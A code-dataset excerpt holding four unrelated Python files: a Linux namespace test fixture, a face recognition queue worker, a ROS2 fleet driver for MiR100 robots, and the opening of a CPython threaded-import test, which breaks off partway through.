source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
namespaces.py
|
import contextlib
import ctypes
import errno
import os
import pyroute2
import pytest
import signal
import multiprocessing
# All allowed namespace types
NAMESPACE_FLAGS = dict(mnt=0x00020000,
uts=0x04000000,
ipc=0x08000000,
user=0x10000000,
pid=0x20000000,
net=0x40000000)
STACKSIZE = 1024*1024
libc = ctypes.CDLL('libc.so.6', use_errno=True)
@contextlib.contextmanager
def keep_directory():
"""Restore the current directory on exit."""
pwd = os.getcwd()
try:
yield
finally:
os.chdir(pwd)
def mount_sys(target="/sys"):
flags = [2 | 4 | 8] # MS_NOSUID | MS_NODEV | MS_NOEXEC
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"none",
target.encode('ascii'),
b"sysfs",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def mount_tmpfs(target, private=False):
flags = [0]
if private:
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"none",
target.encode('ascii'),
b"tmpfs",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def _mount_proc(target):
flags = [2 | 4 | 8] # MS_NOSUID | MS_NODEV | MS_NOEXEC
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"proc",
target.encode('ascii'),
b"proc",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def mount_proc(target="/proc"):
# We need to be sure /proc is correct. We do that in another
# process as this doesn't play well with setns().
if not os.path.isdir(target):
os.mkdir(target)
p = multiprocessing.Process(target=_mount_proc, args=(target,))
p.start()
p.join()
class Namespace(object):
"""Combine several namespaces into one.
This gets a list of namespace types to create and combine into one. The
combined namespace can be used as a context manager to enter all the
created namespaces and exit them at the end.
"""
def __init__(self, *namespaces):
self.next = []
self.namespaces = namespaces
for ns in namespaces:
assert ns in NAMESPACE_FLAGS
# Get a pipe to signal the future child to exit
self.pipe = os.pipe()
# First, create a child in the given namespaces
child = ctypes.CFUNCTYPE(ctypes.c_int)(self.child)
child_stack = ctypes.create_string_buffer(STACKSIZE)
child_stack_pointer = ctypes.c_void_p(
ctypes.cast(child_stack,
ctypes.c_void_p).value + STACKSIZE)
flags = signal.SIGCHLD
for ns in namespaces:
flags |= NAMESPACE_FLAGS[ns]
pid = libc.clone(child, child_stack_pointer, flags)
if pid == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
# If a user namespace, map UID 0 to the current one
if 'user' in namespaces:
uid_map = '0 {} 1'.format(os.getuid())
gid_map = '0 {} 1'.format(os.getgid())
with open('/proc/{}/uid_map'.format(pid), 'w') as f:
f.write(uid_map)
with open('/proc/{}/setgroups'.format(pid), 'w') as f:
f.write('deny')
with open('/proc/{}/gid_map'.format(pid), 'w') as f:
f.write(gid_map)
# Retrieve a file descriptor to this new namespace
self.next = [os.open('/proc/{}/ns/{}'.format(pid, x),
os.O_RDONLY) for x in namespaces]
# Keep a file descriptor to our old namespaces
self.previous = [os.open('/proc/self/ns/{}'.format(x),
os.O_RDONLY) for x in namespaces]
# Tell the child all is done and let it die
os.close(self.pipe[0])
if 'pid' not in namespaces:
os.close(self.pipe[1])
self.pipe = None
os.waitpid(pid, 0)
def __del__(self):
for fd in self.next:
os.close(fd)
for fd in self.previous:
os.close(fd)
if self.pipe is not None:
os.close(self.pipe[1])
def child(self):
"""Cloned child.
Just be here until our parent extract the file descriptor from
us.
"""
os.close(self.pipe[1])
# For a network namespace, enable lo
if 'net' in self.namespaces:
with pyroute2.IPRoute() as ipr:
lo = ipr.link_lookup(ifname='lo')[0]
ipr.link('set', index=lo, state='up')
# For a mount namespace, make it private
if 'mnt' in self.namespaces:
libc.mount(b"none", b"/", None,
# MS_REC | MS_PRIVATE
16384 | (1 << 18),
None)
while True:
try:
os.read(self.pipe[0], 1)
except OSError as e:
if e.errno in [errno.EAGAIN, errno.EINTR]:
continue
break
os._exit(0)
def fd(self, namespace):
"""Return the file descriptor associated to a namespace"""
assert namespace in self.namespaces
return self.next[self.namespaces.index(namespace)]
def __enter__(self):
with keep_directory():
for n in self.next:
if libc.setns(n, 0) == -1:
ns = self.namespaces[self.next.index(n)] # NOQA
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def __exit__(self, *exc):
with keep_directory():
err = None
for p in reversed(self.previous):
if libc.setns(p, 0) == -1 and err is None:
ns = self.namespaces[self.previous.index(p)] # NOQA
e = ctypes.get_errno()
err = OSError(e, os.strerror(e))
if err:
raise err
def __repr__(self):
return 'Namespace({})'.format(", ".join(self.namespaces))
class NamespaceFactory(object):
"""Dynamically create namespaces as they are created.
Those namespaces are namespaces for IPC, net, mount and UTS. PID
is a bit special as we have to keep a process for that. We don't
do that to ensure that everything is cleaned
automatically. Therefore, the child process is killed as soon as
we got a file descriptor to the namespace. We don't use a user
namespace either because we are unlikely to be able to exit it.
"""
def __init__(self, tmpdir):
self.namespaces = {}
self.tmpdir = tmpdir
def __call__(self, ns):
"""Return a namespace. Create it if it doesn't exist."""
if ns in self.namespaces:
return self.namespaces[ns]
self.namespaces[ns] = Namespace('ipc', 'net', 'mnt', 'uts')
with self.namespaces[ns]:
mount_proc()
mount_sys()
# Also setup the "namespace-dependant" directory
self.tmpdir.join("ns").ensure(dir=True)
mount_tmpfs(str(self.tmpdir.join("ns")), private=True)
return self.namespaces[ns]
@pytest.fixture
def namespaces(tmpdir):
return NamespaceFactory(tmpdir)
|
face.py
|
import _thread as thread
import ast
import io
import json
import os
import sqlite3
import sys
import time
import warnings
from multiprocessing import Process
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "."))
from shared import SharedOptions
if SharedOptions.PROFILE == "windows_native":
sys.path.append(os.path.join(SharedOptions.APP_DIR,"windows_packages"))
import numpy as np
import torch
# import cv2
import torch.nn.functional as F
import torchvision.transforms as transforms
from PIL import Image, UnidentifiedImageError
from process import YOLODetector
from recognition import FaceRecognitionModel
from redis import RedisError, StrictRedis
import traceback
def load_faces():
master_face_map = {"map": {}}
SELECT_FACE = "SELECT * FROM {}".format(SharedOptions.TB_EMBEDDINGS)
conn = sqlite3.connect(SharedOptions.DATA_DIR + "/faceembedding.db")
cursor = conn.cursor()
embeddings = cursor.execute(SELECT_FACE)
embedding_arr = []
i = 0
for row in embeddings:
embedding = row[1]
user_id = row[0]
embedding = ast.literal_eval(embedding)
embedding_arr.append(embedding)
master_face_map["map"][i] = user_id
i += 1
master_face_map["tensors"] = embedding_arr
facemap = repr(master_face_map)
SharedOptions.db.set("facemap", facemap)
conn.close()
def face(thread_name, delay):
if SharedOptions.MODE == "High":
reso = SharedOptions.SETTINGS.FACE_HIGH
elif SharedOptions.MODE == "Low":
reso = SharedOptions.SETTINGS.FACE_LOW
else:
reso = SharedOptions.SETTINGS.FACE_MEDIUM
faceclassifier = FaceRecognitionModel(
os.path.join(SharedOptions.SHARED_APP_DIR, "facerec-high.model"),
cuda=SharedOptions.CUDA_MODE,
)
detector = YOLODetector(
os.path.join(SharedOptions.SHARED_APP_DIR, SharedOptions.SETTINGS.FACE_MODEL),
reso,
cuda=SharedOptions.CUDA_MODE,
)
load_faces()
ADD_FACE = "INSERT INTO TB_EMBEDDINGS(userid,embedding) VALUES(?,?)"
UPDATE_FACE = "UPDATE TB_EMBEDDINGS SET embedding = ? where userid = ?"
SELECT_FACE = "SELECT * FROM TB_EMBEDDINGS where userid = ? "
trans = transforms.Compose(
[
transforms.Resize((112, 112)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
]
)
IMAGE_QUEUE = "face_queue"
while True:
queue = SharedOptions.db.lrange(IMAGE_QUEUE, 0, 0)
SharedOptions.db.ltrim(IMAGE_QUEUE, len(queue), -1)
if len(queue) > 0:
for req_data in queue:
req_data = json.JSONDecoder().decode(req_data)
task_type = req_data["reqtype"]
req_id = req_data["reqid"]
if task_type == "detect":
img_id = req_data["imgid"]
img_path = os.path.join(SharedOptions.TEMP_PATH, img_id)
try:
threshold = float(req_data["minconfidence"])
det = detector.predict(img_path, threshold)
os.remove(img_path)
outputs = []
for *xyxy, conf, cls in reversed(det):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
score = conf.item()
detection = {
"confidence": score,
"x_min": int(x_min),
"y_min": int(y_min),
"x_max": int(x_max),
"y_max": int(y_max),
}
outputs.append(detection)
output = {"success": True, "predictions": outputs}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(img_path):
os.remove(img_path)
elif task_type == "register":
try:
user_id = req_data["userid"]
user_images = req_data["images"]
conn = sqlite3.connect(
SharedOptions.DATA_DIR + "/faceembedding.db"
)
batch = None
for img_id in user_images:
img_path = os.path.join(SharedOptions.TEMP_PATH , img_id)
pil_image = Image.open(img_path).convert("RGB")
det = detector.predict(img_path, 0.55)
os.remove(img_path)
outputs = []
new_img = None
for *xyxy, conf, cls in reversed(det):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
new_img = pil_image.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
break
if new_img is not None:
img = trans(new_img).unsqueeze(0)
if batch is None:
batch = img
else:
batch = torch.cat([batch, img], 0)
if batch is None:
output = {
"success": False,
"error": "no face detected",
"code": 400,
}
SharedOptions.db.set(req_id, json.dumps(output))
continue
img_embeddings = faceclassifier.predict(batch).cpu()
img_embeddings = torch.mean(img_embeddings, 0)
cursor = conn.cursor()
emb = img_embeddings.tolist()
emb = repr(emb)
exist_emb = cursor.execute(SELECT_FACE, (user_id,))
user_exist = False
for row in exist_emb:
user_exist = True
break
if user_exist:
cursor.execute(UPDATE_FACE, (emb, user_id))
message = "face updated"
else:
cursor.execute(ADD_FACE, (user_id, emb))
message = "face added"
conn.commit()
output = {"success": True, "message": message}
conn.close()
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
for img_id in user_images:
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , img_id)):
os.remove(os.path.join(SharedOptions.TEMP_PATH , img_id))
elif task_type == "recognize":
try:
master_face_map = SharedOptions.db.get("facemap")
master_face_map = ast.literal_eval(master_face_map)
facemap = master_face_map["map"]
face_array = master_face_map["tensors"]
if len(face_array) > 0:
face_array_tensors = [
torch.tensor(emb).unsqueeze(0) for emb in face_array
]
face_tensors = torch.cat(face_array_tensors)
if SharedOptions.CUDA_MODE and len(face_array) > 0:
face_tensors = face_tensors.cuda()
img_id = req_data["imgid"]
threshold = float(req_data["minconfidence"])
img = os.path.join(SharedOptions.TEMP_PATH , img_id)
pil_image = Image.open(img).convert("RGB")
det = detector.predict(img, 0.55)
os.remove(img)
faces = [[]]
detections = []
found_face = False
for *xyxy, conf, cls in reversed(det):
found_face = True
x_min = int(xyxy[0])
y_min = int(xyxy[1])
x_max = int(xyxy[2])
y_max = int(xyxy[3])
new_img = pil_image.crop((x_min, y_min, x_max, y_max))
img_tensor = trans(new_img).unsqueeze(0)
if len(faces[-1]) % 10 == 0 and len(faces[-1]) > 0:
faces.append([img_tensor])
else:
faces[-1].append(img_tensor)
detections.append((x_min, y_min, x_max, y_max))
if found_face == False:
output = {"success": True, "predictions": []}
SharedOptions.db.set(req_id, json.dumps(output))
elif len(facemap) == 0:
predictions = []
for face in detections:
x_min = int(face[0])
if x_min < 0:
x_min = 0
_min = int(face[1])
if y_min < 0:
y_min = 0
x_max = int(face[2])
if x_max < 0:
x_max = 0
y_max = int(face[3])
if y_max < 0:
y_max = 0
user_data = {
"confidence": 0,
"userid": "unknown",
"x_min": x_min,
"y_min": y_min,
"x_max": x_max,
"y_max": y_max,
}
predictions.append(user_data)
output = {"success": True, "predictions": predictions}
SharedOptions.db.set(req_id, json.dumps(output))
else:
embeddings = []
for face_list in faces:
embedding = faceclassifier.predict(torch.cat(face_list))
embeddings.append(embedding)
embeddings = torch.cat(embeddings)
predictions = []
for embedding, face in zip(embeddings, detections):
embedding = embedding.unsqueeze(0)
embedding_proj = torch.cat(
[embedding for i in range(face_tensors.size(0))]
)
similarity = F.cosine_similarity(
embedding_proj, face_tensors
)
user_index = similarity.argmax().item()
max_similarity = (similarity.max().item() + 1) / 2
if max_similarity < threshold:
confidence = 0
user_id = "unknown"
else:
confidence = max_similarity
user_id = facemap[user_index]
x_min = int(face[0])
if x_min < 0:
x_min = 0
y_min = int(face[1])
if y_min < 0:
y_min = 0
x_max = int(face[2])
if x_max < 0:
x_max = 0
y_max = int(face[3])
if y_max < 0:
y_max = 0
user_data = {
"confidence": confidence,
"userid": user_id,
"x_min": x_min,
"y_min": y_min,
"x_max": x_max,
"y_max": y_max,
}
predictions.append(user_data)
output = {"success": True, "predictions": predictions}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , img_id)):
os.remove(os.path.join(SharedOptions.TEMP_PATH , img_id))
elif task_type == "match":
try:
user_images = req_data["images"]
img1 = os.path.join(SharedOptions.TEMP_PATH , user_images[0])
img2 = os.path.join(SharedOptions.TEMP_PATH , user_images[1])
image1 = Image.open(img1).convert("RGB")
image2 = Image.open(img2).convert("RGB")
det1 = detector.predict(img1, 0.8)
det2 = detector.predict(img2, 0.8)
os.remove(img1)
os.remove(img2)
if len(det1) == 0 or len(det2) == 0:
output = {"success": False, "error": "no face found"}
SharedOptions.db.set(req_id, json.dumps(output))
continue
for *xyxy, conf, cls in reversed(det1):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
face1 = trans(
image1.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
).unsqueeze(0)
break
for *xyxy, conf, cls in reversed(det2):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
face2 = trans(
image2.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
).unsqueeze(0)
break
faces = torch.cat([face1, face2], dim=0)
embeddings = faceclassifier.predict(faces)
embed1 = embeddings[0, :].unsqueeze(0)
embed2 = embeddings[1, :].unsqueeze(0)
similarity = (
F.cosine_similarity(embed1, embed2).item() + 1
) / 2
output = {"success": True, "similarity": similarity}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , user_images[0])):
os.remove(os.path.join(SharedOptions.TEMP_PATH , user_images[0]))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , user_images[1])):
os.remove(os.path.join(SharedOptions.TEMP_PATH , user_images[1]))
time.sleep(delay)
def update_faces(thread_name, delay):
while True:
load_faces()
time.sleep(delay)
if __name__ == "__main__":
p1 = Process(target=update_faces, args=("", 1))
p1.start()
p = Process(target=face, args=("", SharedOptions.SLEEP_TIME))
p.start()
|
report_positions_in_rmf_coord.py
|
# Code attribution from https://github.com/osrf/rmf/blob/master/ros2/fleet_adapter_mir/fleet_adapter_mir/fleet_adapter_mir/
import enum
import math
import time
import argparse
import json
import threading
import nudged
from datetime import datetime
import mir100_client
from mir100_client.rest import ApiException
from mir100_client.models import PostMissionQueues, PostMissions, PostMissionActions, PutStatus
import urllib3
import rclpy
from rclpy.node import Node
from rmf_fleet_msgs.msg import PathRequest, ModeRequest, RobotState, FleetState, \
Location, RobotMode, ModeParameter
class Robot():
def __init__(self, parent):
self.parent = parent
self.name = None
self.api = None
self.missions = {}
self.maps = {}
self.positions = {}
self.current_map = None
self.current_target = None
self.prev_target = None
self.place_sub = None
self.mode_sub = None
self.mode = None
self.current_task_id = 'idle'
self.remaining_path = []
self.docking_executed = False
self.docking_requested = False
# Variables for managing the path queue execution thread
self._path_following_thread = None
self._path_quit_event = threading.Event()
self._path_quit_cv = threading.Condition()
def cancel_path(self):
self.remaining_path.clear()
self.mode = RobotMode.MODE_PAUSED
if self._path_following_thread is not None:
self._path_quit_event.set()
self._path_quit_cv.acquire()
self._path_quit_cv.notify_all()
self._path_quit_cv.release()
self._path_following_thread.join()
self.api.mission_queue_delete()
def follow_new_path(self, msg):
self.docking_requested = False
self.docking_executed = False
self.current_task_id = msg.task_id
self.cancel_path()
# Set MiR state from PAUSE (if) to READY everytime receives new path
# pick up from commit 15b2bfc
status = PutStatus(state_id=MirState.READY)
self.api.status_put(status)
def path_following_closure():
# This function defines a worker thread that will wakeup at whatever times are needed
while (not self._path_quit_event.is_set()) and self.remaining_path:
next_ros_time = self.remaining_path[0].t
next_mission_time = next_ros_time.sec + next_ros_time.nanosec/1e9
next_mission_wait = next_mission_time - time.time()
# print(f'next_mission_time: {next_mission_time}, \
# next_mission_wait: {next_mission_wait}')
if next_mission_wait <= 0 and self.mode == MirState.READY and self.remaining_path:
self.remaining_path.pop(0)
if not self.remaining_path:
return
next_mission_location = self.remaining_path[0]
mir_p = self.parent.rmf2mir_transform.transform(
[next_mission_location.x, next_mission_location.y])
mir_location = Location()
mir_location.x = mir_p[0]
mir_location.y = mir_p[1]
yaw = math.degrees(
next_mission_location.yaw
+ self.parent.rmf2mir_transform.get_rotation()
)
print(
f'RMF location x:{next_mission_location.x} y:{next_mission_location.y}')
if yaw > 180.0:
yaw = yaw - 360.0
elif yaw <= -180.0:
yaw = yaw + 360.0
mir_location.yaw = yaw
print(f'location: {mir_location}')
# Check whether mission is in mission list
mission_name = f'move_coordinate_to_{mir_location.x:.2f}_{mir_location.y:.2f}_{mir_location.yaw:.2f}'
if mission_name not in self.missions:
print(f'Creating a new mission named {mission_name}')
mission_id = self.parent.create_move_coordinate_mission(
self, mir_location)
else:
mission_id = self.missions[mission_name]
try:
mission = PostMissionQueues(mission_id=mission_id)
self.api.mission_queue_post(mission)
except KeyError:
self.parent.get_logger().error(
f'no mission to move coordinates to [{mir_location.x:3f}_{mir_location.y:.3f}]!'
)
continue
self._path_quit_cv.acquire()
self._path_quit_cv.wait(next_mission_wait)
self._path_quit_cv.release()
self.remaining_path = msg.path
self._path_quit_event.clear()
self._path_following_thread = threading.Thread(
target=path_following_closure)
self._path_following_thread.start()
class MirState(enum.IntEnum):
READY = 3
PAUSE = 4
EXECUTING = 5
MANUAL_CONTROL = 11
ERROR = 12
class MirPositionTypes(enum.IntEnum):
ROBOT = 0
CHARGING_STATION = 7
CHARGING_STATION_ENTRY = 8
class FleetDriverMir(Node):
FLEET_NAME = 'mir100'
STATUS_PUB_PERIOD = 1.0
def __init__(self, fleet_config):
super().__init__('fleet_driver_mir')
self.fleet_config = fleet_config
self.robots = {}
self.api_clients = []
self.status_pub = self.create_publisher(FleetState, 'fleet_states', 1)
self.pub_timer = self.create_timer(
self.STATUS_PUB_PERIOD, self.pub_fleet
)
self.ref_coordinates_rmf = [[26.95, -20.23], [29.26, -22.38], [11.4, -16.48],
[12.46, -16.99]]
self.ref_coordinates_mir = [[7.2, 16.6], [5.15, 18.35], [23, 12.35],
[22.05, 12.95]]
self.rmf2mir_transform = nudged.estimate(
self.ref_coordinates_rmf,
self.ref_coordinates_mir
)
self.mir2rmf_transform = nudged.estimate(
self.ref_coordinates_mir,
self.ref_coordinates_rmf
)
mse = nudged.estimate_error(self.rmf2mir_transform,
self.ref_coordinates_rmf,
self.ref_coordinates_mir)
self.get_logger().info(f'transformation estimate error: {mse}')
for api_client in self.create_all_api_clients(self.fleet_config):
self.get_logger().info(f'initializing robot from \
{api_client.configuration.host}')
robot = Robot(self)
robot.api = mir100_client.DefaultApi(api_client)
# temporary retry configuration to workaround startup race condition while launching
connection_pool_kw = robot.api.api_client.rest_client.pool_manager.connection_pool_kw
orig_retries = connection_pool_kw.get('retries')
retries = urllib3.Retry(10)
retries.backoff_factor = 1
retries.status_forcelist = (404,)
connection_pool_kw['retries'] = retries
mir_status = robot.api.status_get()
robot.name = mir_status.robot_name
self.load_missions(robot)
self.update_positions(robot)
# reset retries
if orig_retries is not None:
connection_pool_kw['retries'] = orig_retries
else:
del connection_pool_kw['retries']
self.robots[robot.name] = robot
self.get_logger().info(f'successfully initialized robot \
{robot.name}')
# Setup fleet driver ROS2 topic subscriptions
self.path_request_sub = self.create_subscription(
PathRequest, '/robot_path_requests', self.on_path_request, 1
)
self.mode_sub = self.create_subscription(
ModeRequest, f'/robot_mode_requests', self.on_robot_mode_request, 1
)
def pub_fleet(self):
fleet_state = FleetState()
fleet_state.name = self.FLEET_NAME
now = time.time()
now_sec = int(now)
now_ns = int((now - now_sec) * 1e9)
try:
for robot in self.robots.values():
api_response = robot.api.status_get()
robot_state = RobotState()
robot_state.name = robot.name
robot_state.task_id = robot.current_task_id
robot_state.battery_percent = api_response.battery_percentage
location = Location()
location.x = api_response.position.x
location.y = api_response.position.y
location.yaw = api_response.position.orientation
# TODO Transform yaw from MiR frame to RMF frame
mir_pos = [location.x, location.y]
rmf_pos = self.mir2rmf_transform.transform(mir_pos)
rmf_location = Location()
rmf_location.x = rmf_pos[0]
rmf_location.y = rmf_pos[1]
rmf_location.yaw = math.radians(
location.yaw) + self.mir2rmf_transform.get_rotation()
robot_state.location = rmf_location
robot_state.path = robot.remaining_path
robot_state.location.t.sec = now_sec
robot_state.location.t.nanosec = now_ns
if api_response.mission_text.startswith('Charging'):
robot_state.mode.mode = RobotMode.MODE_CHARGING
robot.mode = MirState.READY
elif api_response.state_id == MirState.PAUSE:
robot_state.mode.mode = RobotMode.MODE_PAUSED
robot.mode = MirState.PAUSE
elif api_response.state_id == MirState.EXECUTING and \
not api_response.mission_text.startswith('Charging'):
robot_state.mode.mode = RobotMode.MODE_MOVING
robot.mode = MirState.EXECUTING
elif api_response.state_id == MirState.READY:
robot_state.mode.mode = RobotMode.MODE_IDLE
robot.mode = MirState.READY
# print(f'[{api_response.state_id}] [{api_response.state_text}] [{api_response.mission_text}]')
fleet_state.robots.append(robot_state)
if robot.docking_requested:
if not robot.docking_executed:
robot.docking_executed = (
'docking' in api_response.mission_text.lower())
if robot.docking_executed and api_response.state_id == MirState.READY:
robot_state.mode.mode = RobotMode.MODE_IDLE
else:
robot_state.mode.mode = RobotMode.MODE_DOCKING
self.status_pub.publish(fleet_state)
except ApiException as e:
self.get_logger().warn('Exception when calling \
DefaultApi->status_get: %s\n' % e)
def on_robot_mode_request(self, msg):
robot = self.robots.get(msg.robot_name)
if not robot:
self.get_logger().info(
f'Could not find a robot named [{msg.robot_name}]')
return
if robot.current_task_id == msg.task_id:
self.get_logger().info(f'Already following task [{msg.task_id}]')
return
robot.cancel_path()
# Mapping from RMF modes to MiR modes
# manual control is MiR mode 11
mir_mode_request_dict = {
RobotMode.MODE_MOVING: MirState.READY,
RobotMode.MODE_PAUSED: MirState.PAUSE
}
desired_mir_mode = mir_mode_request_dict.get(msg.mode.mode)
if desired_mir_mode:
self.get_logger().info(
f'setting robot {msg.robot_name} mode to {msg.mode}')
status = PutStatus(state_id=desired_mir_mode)
robot.api.status_put(status)
return
if not msg.parameters:
self.get_logger().info(
f'Mode [{msg.mode.mode}] not recognized or requires additional parameters'
)
return
# Find the mission
mission_str = f'{msg.parameters[0].name}_{msg.parameters[0].value}'
self.get_logger().info(
f'Attempting to send mission [{mission_str}] to robot [{msg.robot_name}]')
try:
mission_id = robot.missions[mission_str].guid
except KeyError:
self.get_logger().error(f'Cannot find mission [{mission_str}]')
return
# Execute the mission
try:
mission = PostMissionQueues(mission_id=mission_id)
robot.api.mission_queue_post(mission)
except KeyError:
self.get_logger().error('Error when posting charging mission')
return
if msg.parameters[0].name == 'docking':
robot.docking_requested = True
robot.docking_executed = False
print(' === We are in docking mode')
robot.current_task_id = msg.task_id
def calculate_path_request_yaw(self, location_request, location_request_next):
dx = location_request_next.x - location_request.x
dy = location_request_next.y - location_request.y
return math.atan2(dy, dx)
def on_path_request(self, msg):
robot = self.robots.get(msg.robot_name)
if not robot:
self.get_logger().info(
f'Could not find robot with the name [{msg.robot_name}]')
return
if robot.current_task_id == msg.task_id:
self.get_logger().info(f'Already received task [{msg.task_id}].')
return
self.get_logger().info(
f'Issuing task [{msg.task_id}] to robot [{msg.robot_name}]')
robot.follow_new_path(msg)
def load_missions(self, robot):
self.get_logger().info('retrieving missions...')
robot_missions_ls = robot.api.missions_get()
# If name starts with 'move_coordinate'
for i in robot_missions_ls:
if "move_coordinate" in i.name:
print("removing {}".format(i.name))
robot.api.missions_guid_delete(i.guid)
self.get_logger().info(f'retrieved {len(robot.missions)} missions')
def create_move_coordinate_mission(self, robot, location, retries=10):
mission = PostMissions(
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'move_coordinate_to_{location.x:.3f}_{location.y:.3f}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
action = PostMissionActions(
action_type='move_to_position',
mission_id=response.guid,
parameters=[
{'id': 'x', 'value': location.x},
{'id': 'y', 'value': location.y},
{'id': 'orientation', 'value': location.yaw},
{'id': 'retries', 'value': retries},
{'id': 'distance_threshold', 'value': 0.1},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(
f'created mission to move coordinate to "{location}"')
return response.guid
def create_dock_mission(self, robot, dock_name):
mission = PostMissions(
# mir const, retrieved with GET /mission_groups
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'dock_to_{dock_name}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
action = PostMissionActions(
action_type='docking',
mission_id=response.guid,
parameters=[
{'id': 'marker', 'value': dock_name},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(f'created mission to move to "{dock_name}"')
return response.guid
def create_move_mission(self, robot, place_name, retries=10):
'''
creates a mission to move to metamap place
'''
mission = PostMissions(
# mir const, retrieved with GET /mission_groups
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'move_to_{place_name}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
dist_threshold = 0.1
action = PostMissionActions(
action_type='move',
mission_id=response.guid,
parameters=[
{'id': 'position', 'value': robot.positions[place_name].guid},
{'id': 'retries', 'value': retries},
{'id': 'distance_threshold', 'value': dist_threshold},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(f'created mission to move to "{place_name}"')
return response.guid
def update_positions(self, robot):
self.get_logger().info('retrieving positions...')
count = 0
now = datetime.now()
stamp = now.strftime("%y%m%d_%H%M")
stamp = "mir_positions_transformed_"+stamp
big_dict = []
with open(stamp+".json", "w+") as f:
for pos in robot.api.positions_get():
if pos.name not in robot.positions or pos.guid != robot.positions[pos.name].guid:
if pos.type_id == MirPositionTypes.ROBOT or \
pos.type_id == MirPositionTypes.CHARGING_STATION_ENTRY:
robot.positions[pos.name] = robot.api.positions_guid_get(
pos.guid)
count += 1
pos_dict = robot.api.positions_guid_get(pos.guid)
pos_dict = pos_dict.to_dict()
pos_dict['rmf_x'], pos_dict['rmf_y'] = self.mir2rmf_transform.transform(
[pos_dict['pos_x'], pos_dict['pos_y']])
big_dict.append(pos_dict)
json.dump(big_dict, f)
self.get_logger().info(f'updated {count} positions')
def create_all_api_clients(self, config):
# self.api_clients = []
for i in range(len(config['robots'])):
self.api_clients.append(self.create_single_api_client(config, i))
return self.api_clients
def create_single_api_client(self, config, idx):
robot_config = config['robots'][idx]
configuration = mir100_client.Configuration()
configuration.host = robot_config['base_url']
configuration.username = robot_config['user']
configuration.password = robot_config['password']
api_client = mir100_client.ApiClient(configuration)
api_client.default_headers['Accept-Language'] = 'en-US'
return api_client
def main():
parser = argparse.ArgumentParser()
parser.add_argument("fleet_config_file", nargs=1)
args = parser.parse_args()
with open(args.fleet_config_file[0], 'r') as f:
fleet_config = json.load(f)
rclpy.init()
node = FleetDriverMir(fleet_config)
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from unittest import mock
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree, start_threads)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
